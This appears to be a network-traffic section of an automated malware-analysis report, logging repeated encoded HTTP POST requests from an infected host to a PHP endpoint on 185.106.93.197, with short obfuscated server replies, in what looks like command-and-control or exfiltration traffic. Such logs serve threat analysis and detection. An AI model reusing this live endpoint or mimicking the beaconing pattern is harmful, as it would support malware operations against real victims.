Aug 28, 2024 11:17:16.737906933 CEST	344	OUT	Data Raw: 00 05 04 06 03 0a 01 03 05 06 02 01 02 07 01 04 00 05 05 01 02 07 03 09 03 05 0d 56 05 04 00 03 0e 01 06 00 01 0c 06 55 0f 05 06 07 05 03 05 51 05 03 0c 5e 0e 00 04 52 07 0f 05 01 04 04 00 0c 01 02 0f 0a 00 05 04 01 0e 54 0c 0e 0e 07 0c 54 06 06 Data Ascii: VUQ^RTT^T\L~@\|sfO`biLb[pO~lSwRc_k]kZ{UoElvm\|Ntw^ie~V@A{Cn}Lu
Aug 28, 2024 11:17:17.071170092 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:17.237724066 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1352 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 56 4a 7e 43 78 54 7c 5f 7b 5c 7f 5b 68 61 7c 5b 7d 77 78 54 7e 60 7d 09 7a 73 68 4f 7f 72 5d 5b 63 73 65 08 7b 72 7a 5a 76 48 74 02 7e 71 78 01 55 4b 71 4f 63 62 7b 01 7c 72 5b 4d 7d 64 76 08 78 66 5a 0c 7c 70 6b 00 77 72 6d 4f 63 5f 75 01 68 5f 6a 04 69 6f 78 40 7e 77 68 59 62 5c 7b 06 7c 5c 6d 49 6a 59 7e 5e 78 74 73 59 6f 59 5e 01 6c 6d 5a 5c 79 71 60 48 7b 05 7e 41 7f 5e 68 4b 78 77 5d 5e 7c 62 55 07 75 72 63 59 7a 51 41 5b 68 59 74 0c 68 58 6e 55 61 6f 63 5f 7a 6c 63 59 63 5e 5c 43 6d 4f 62 5c 7d 42 54 07 78 4f 58 49 62 5a 67 06 61 07 78 05 63 5f 54 50 7e 5d 79 5f 77 4c 6e 5d 61 66 60 09 7e 6f 76 5c 77 7c 70 04 7c 70 7c 00 78 6f 6f 03 6c 4e 66 06 7c 6d 7c 08 77 77 6c 02 7e 62 5c 09 69 54 7b 42 6c 0b 72 4c 7e 5b 66 5e 7b 5d 46 51 7f 6f 63 55 7d 63 60 0c 69 67 72 01 78 54 74 5a 6c 62 64 01 7f 62 60 59 7c 67 55 0b 6b 59 7a 51 7b 63 5a 42 7f 72 73 5a 74 05 69 51 7b 5c 79 02 75 76 68 07 7c 66 70 03 7d 76 71 40 76 72 55 44 7c 4c 65 4d 7c 77 66 0a 7b 58 74 41 7c 63 67 02 75 4c 79 4f 76 61 61 04 7f 71 [TRUNCATED] Data Ascii: VJ~CxT\|_{\[ha\|[}wxT~`}zshOr][cse{rzZvHt~qxUKqOcb{\|r[M}dvxfZ\|pkwrmOc_uh_jiox@~whYb\{\|\mIjY~^xtsYoY^lmZ\yq`H{~A^hKxw]^\|bUurcYzQA[hYthXnUaoc_zlcYc^\CmOb\}BTxOXIbZgaxc_TP~]y_wLn]af`~ov\w\|p\|p\|xoolNf\|m\|wwl~b\iT{BlrL~[f^{]FQocU}c`igrxTtZlbdb`Y\|gUkYzQ{cZBrsZtiQ{\yuvh\|fp}vq@vrUD\|LeM\|wf{XtA\|cguLyOvaaqv}R^}gcuaQHx\_J~NqIxYhxg`LymsFybp{]nA\|^^{gpD~\Uvq\|}B{\|wtO\|amvRpxlhKtpzz_e\|\|~OxOXIv]Qv_xtOrANzNwrqwetByMtB^\|Mly\|{z`jKSttwxO}bz}So{SvA~L}@`dAlZ}NV}g\Lz}sxLp\|qkJ\|gcN[zcxMbRIwMqAyqWvXd}XZ~v[wbk\|LaLYT@{v^~MQvritOi\|q~~BR~wcuawJ{r[\|`Sxwpyw^B{mkFyrdK{cz{]NZlY\|irca_pG}lh^\|kbbQuUl{dc^fzaaGjBP_z\y\}b`g{ZL~JxY~`bT]vfthlqwl\|~sUYols{p[[hSR@tgZN~b[RzSYQQTGSchcQUlP\|wxiw_Yom{JobxFb`_~wlPhcumcQYjr{YwZfTyOyKwaxVK{YjeO[~d]SaSQ^eAReoBWt{q\_CwqaE\|azK\|RxCyZEZbdFVq@iTFnwDR{R\yPx~mnVVb`OSMp@^Q_QtD\bQ@QTKhdUHPPwQsyo`RVnc@UL}CzUWZWqB\`RCZYOcbSISs[jYq[VQeT[\u{s[k`DTp`\TcUQToWXdCd[qLij\|R
Aug 28, 2024 11:17:17.237739086 CEST	345	IN	Data Raw: 5a 54 4f 72 6d 50 07 7b 4a 7b 51 4e 50 6a 06 67 4e 50 74 4f 05 6f 0b 5e 46 6e 04 7f 47 55 62 07 03 50 5d 5a 7c 53 06 62 54 7d 5d 56 5c 66 60 78 58 75 74 7a 56 6e 62 09 44 5a 7a 67 5c 52 65 04 51 69 00 01 09 5b 58 60 4a 57 63 05 5d 50 64 66 50 79 Data Ascii: ZTOrmP{J{QNPjgNPtOo^FnGUbP]Z\|SbT}]V\f`xXutzVnbDZzg\ReQi[X`JWc]PdfPy[snQZ^baiQljXUreKyQBPjdE[rJoTEkvET]kDT^o@R\|\|Gmq`Xz^}ycgp@^Q_QtD\bQ@QTXPSbUZVkylo]p^XP`XIWTQdb][ZZYaf\|EpXSUSqD]a\EZ]Kh`bE]po^kdpRgEy^PKStPup
Aug 28, 2024 11:17:17.281449080 CEST	390	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 384 Expect: 100-continue
Aug 28, 2024 11:17:17.493315935 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:17.493779898 CEST	384	OUT	Data Raw: 5e 52 5e 5d 5d 50 5c 57 5b 57 5a 59 52 5b 54 57 54 50 5e 5d 57 54 5a 5e 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^R^]]P\W[WZYR[TWTP^]WTZ^\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS"85?7!-(%)<"?:8%!8('6Y?*=!/"+"Y %X!
Aug 28, 2024 11:17:17.716674089 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1a 24 5c 34 2d 02 0e 25 55 3b 02 3b 01 2d 0f 29 12 28 5f 29 54 27 01 33 3e 02 10 24 2b 3c 57 33 01 37 06 30 32 29 58 26 3d 37 1e 26 1c 2d 5f 06 11 26 1a 34 38 22 07 3b 32 30 54 29 5b 27 03 23 3e 3b 5c 3e 20 36 0e 22 07 2c 05 3f 3c 36 56 2f 21 25 10 29 14 26 5d 2c 3d 09 0e 25 10 21 52 0c 17 21 0a 3f 39 3f 01 23 2b 26 57 30 0c 3c 0d 37 3f 2a 0d 33 3f 2b 1c 24 5c 23 0b 3c 16 24 1c 24 3e 38 56 25 05 3d 12 25 3f 34 0d 39 39 2e 53 22 00 2d 48 0e 3d 54 4d Data Ascii: $\4-%U;;-)(_)T'3>$+<W3702)X&=7&-_&48";20T)['#>;\> 6",?<6V/!%)&],=%!R!?9?#+&W0<7?*3?+$\#<$$>8V%=%?499.S"-H=TM
Aug 28, 2024 11:17:17.749490976 CEST	391	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 1840 Expect: 100-continue
Aug 28, 2024 11:17:17.970599890 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:17.970833063 CEST	1840	OUT	Data Raw: 5e 52 5e 54 58 58 59 52 5b 57 5a 59 52 5d 54 55 54 5a 5e 5f 57 50 5a 5e 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^R^TXXYR[WZYR]TUTZ^_WPZ^\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!@/&\<877#'93!]$S,8=!($$,*(>Z"<>("Y %X!'
Aug 28, 2024 11:17:18.375324011 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1a 24 5d 20 5b 3f 19 25 0d 2c 5d 3b 01 22 55 2a 5a 3c 1d 29 32 38 5e 33 3e 30 10 24 2b 3c 1c 33 38 33 0b 24 32 3d 1b 24 3e 2b 54 32 0c 2d 5f 06 11 26 1c 21 38 00 07 3b 0c 3c 1e 3e 13 23 04 36 00 09 58 3d 33 36 0e 20 2d 3b 5e 3d 02 3a 1d 2c 0f 3a 0f 2a 14 25 04 3b 3e 34 51 24 2a 21 52 0c 17 22 53 3f 39 33 01 37 38 08 1f 27 1c 33 52 34 3c 3e 0e 27 01 37 1d 24 04 28 10 28 06 3b 0e 24 2e 0a 55 25 2b 35 59 24 2f 23 18 3a 39 2e 53 22 00 2d 48 0e 3d 54 4d Data Ascii: $] [?%,];"UZ<)28^3>0$+<383$2=$>+T2-_&!8;<>#6X=36 -;^=:,:%;>4Q$*!R"S?9378'3R4<>'7$((;$.U%+5Y$/#:9.S"-H=TM

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:17.443831921 CEST	391	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue
Aug 28, 2024 11:17:17.799916029 CEST	2512	OUT	Data Raw: 5b 51 5e 5d 58 5b 59 51 5b 57 5a 59 52 54 54 51 54 5f 5e 5e 57 5f 5a 5f 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [Q^]X[YQ[WZYRTTQT_^^W_Z_\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS";1:<? .<19^!;U9;#&/[<:[6/![)"Y %X!
Aug 28, 2024 11:17:18.130306959 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:18.268723011 CEST	151	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:18.745690107 CEST	391	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue
Aug 28, 2024 11:17:19.096940994 CEST	2512	OUT	Data Raw: 5b 5b 5b 5f 58 58 59 54 5b 57 5a 59 52 5d 54 56 54 5c 5e 5e 57 52 5a 5b 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [[[_XXYT[WZYR]TVT\^^WRZ[\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS";!.< !.,X1Z5,T.].R4,$<1?6Y51<9"Y %X!'
Aug 28, 2024 11:17:19.405234098 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:19.536516905 CEST	151	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:19.752758980 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2504 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:20.096744061 CEST	2504	OUT	Data Raw: 5b 56 5b 5f 58 5f 59 51 5b 57 5a 59 52 5c 54 50 54 5e 5e 58 57 56 5a 59 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [V[_X_YQ[WZYR\TPT^^XWVZY\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS"8T.?# \1$ ;:; 06?)#?&?9"Y %X!3
Aug 28, 2024 11:17:20.468700886 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:20.598416090 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:21.037096977 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:21.393640041 CEST	2512	OUT	Data Raw: 5e 56 5e 5d 5d 5b 5c 55 5b 57 5a 59 52 58 54 57 54 5b 5e 5a 57 57 5a 5e 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^V^]][\U[WZYRXTWT[^ZWWZ^\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS",25(^$^7=7296;<W-+Q78 Y3=?9!!)<9"Y %X!3
Aug 28, 2024 11:17:21.727546930 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:21.852617025 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:22.356537104 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:22.711538076 CEST	2512	OUT	Data Raw: 5e 51 5e 55 5d 5e 59 56 5b 57 5a 59 52 5b 54 53 54 50 5e 5e 57 5f 5a 5a 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^Q^U]^YV[WZYR[TSTP^^W_ZZ\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!/-<8#4^27"(<U.=#,Z$+*6"%]<"Y %X!
Aug 28, 2024 11:17:23.031441927 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:23.156459093 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:23.521380901 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 1840 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:23.878211021 CEST	1840	OUT	Data Raw: 5b 57 5e 5e 5d 5b 5c 57 5b 57 5a 59 52 55 54 56 54 50 5e 53 57 5f 5a 55 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [W^^][\W[WZYRUTVTP^SW_ZU\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!E;2:(^'#.(Y%$X6?.+ ;3$,!+Z6=]*9"Y %X!
Aug 28, 2024 11:17:24.235601902 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:24.365592957 CEST	380	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:24 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1a 24 15 23 3d 3b 52 27 23 3f 04 2e 28 0b 09 2a 02 0e 5a 3e 22 20 5e 27 07 33 0f 27 16 2c 54 24 06 0e 1b 33 21 35 5f 33 04 2b 54 26 0c 2d 5f 06 11 25 45 34 2b 21 5c 3b 32 09 0a 2a 3d 28 1e 22 58 3b 59 3e 30 35 53 35 00 2f 18 3f 2c 08 50 38 31 32 0d 2a 39 2e 16 2e 2e 20 19 25 3a 21 52 0c 17 22 18 2b 00 2c 59 34 01 21 0a 27 0c 28 0a 23 59 35 50 24 2f 2b 50 27 3a 23 0c 2b 01 3b 0b 31 2e 24 55 32 02 35 5d 30 2c 34 09 2d 03 2e 53 22 00 2d 48 0e 3d 54 4d Data Ascii: $#=;R'#?.(Z>" ^'3',T$3!5_3+T&-_%E4+!\;2=("X;Y>05S5/?,P812*9... %:!R"+,Y4!'(#Y5P$/+P':#+;1.$U25]0,4-.S"-H=TM
Aug 28, 2024 11:17:24.577871084 CEST	380	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:24 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1a 24 15 23 3d 3b 52 27 23 3f 04 2e 28 0b 09 2a 02 0e 5a 3e 22 20 5e 27 07 33 0f 27 16 2c 54 24 06 0e 1b 33 21 35 5f 33 04 2b 54 26 0c 2d 5f 06 11 25 45 34 2b 21 5c 3b 32 09 0a 2a 3d 28 1e 22 58 3b 59 3e 30 35 53 35 00 2f 18 3f 2c 08 50 38 31 32 0d 2a 39 2e 16 2e 2e 20 19 25 3a 21 52 0c 17 22 18 2b 00 2c 59 34 01 21 0a 27 0c 28 0a 23 59 35 50 24 2f 2b 50 27 3a 23 0c 2b 01 3b 0b 31 2e 24 55 32 02 35 5d 30 2c 34 09 2d 03 2e 53 22 00 2d 48 0e 3d 54 4d Data Ascii: $#=;R'#?.(Z>" ^'3',T$3!5_3+T&-_%E4+!\;2=("X;Y>05S5/?,P812*9... %:!R"+,Y4!'(#Y5P$/+P':#+;1.$U25]0,4-.S"-H=TM

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:26.783189058 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:27.130019903 CEST	2512	OUT	Data Raw: 5e 51 5e 5f 58 58 5c 57 5b 57 5a 59 52 58 54 51 54 50 5e 59 57 5e 5a 5a 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^Q^_XX\W[WZYRXTQTP^YW^ZZ\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!B,1:>;8#X<Y& +4.8>P43',(6/5?)"Y %X!3
Aug 28, 2024 11:17:27.431978941 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:27.564780951 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:28.229636908 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:28.581788063 CEST	2512	OUT	Data Raw: 5e 57 5b 5b 58 5f 59 52 5b 57 5a 59 52 5f 54 5c 54 50 5e 5a 57 53 5a 5a 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: ^W[[X_YR[WZYR_T\TP^ZWSZZ\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!8)?(] #':0!(<.81#Y'6Y()"X"6?"Y %X!/
Aug 28, 2024 11:17:28.878926039 CEST	25	IN	HTTP/1.1 100 Continue
Aug 28, 2024 11:17:29.010469913 CEST	207	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 52 5d 50 Data Ascii: ?R]P

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 11:17:29.555807114 CEST	415	OUT	POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.106.93.197 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 28, 2024 11:17:29.914110899 CEST	2512	OUT	Data Raw: 5b 5b 5e 5e 58 5d 59 53 5b 57 5a 59 52 55 54 53 54 5f 5e 52 57 57 5a 5a 5c 5b 5a 50 5a 59 5b 54 5c 5d 54 47 5a 53 57 55 5f 58 54 56 58 51 57 5b 50 5d 5f 40 58 5d 57 5b 51 53 53 50 54 5c 5f 5a 5f 5f 5d 50 57 52 57 56 5c 5f 59 5b 43 5d 5c 5c 51 50 Data Ascii: [[^^X]YS[WZYRUTST_^RWWZZ\[ZPZY[T\]TGZSWU_XTVXQW[P]_@X]W[QSSPT\_Z__]PWRWV\_Y[C]\\QP[^T[QXWZVP]Z^UZ]XTPX_[][YR\S\U[XWPZZ]R_\ZQSZGPX_[W]YZ^Y^XQP\TPX_TE^QWH]^\XTY[Y_\\V^_ZRZZU[S^VY^^[Y^ZVS!B;&?#=(^'97!+(V:2P#+'0"[*:>!?%\("Y %X!
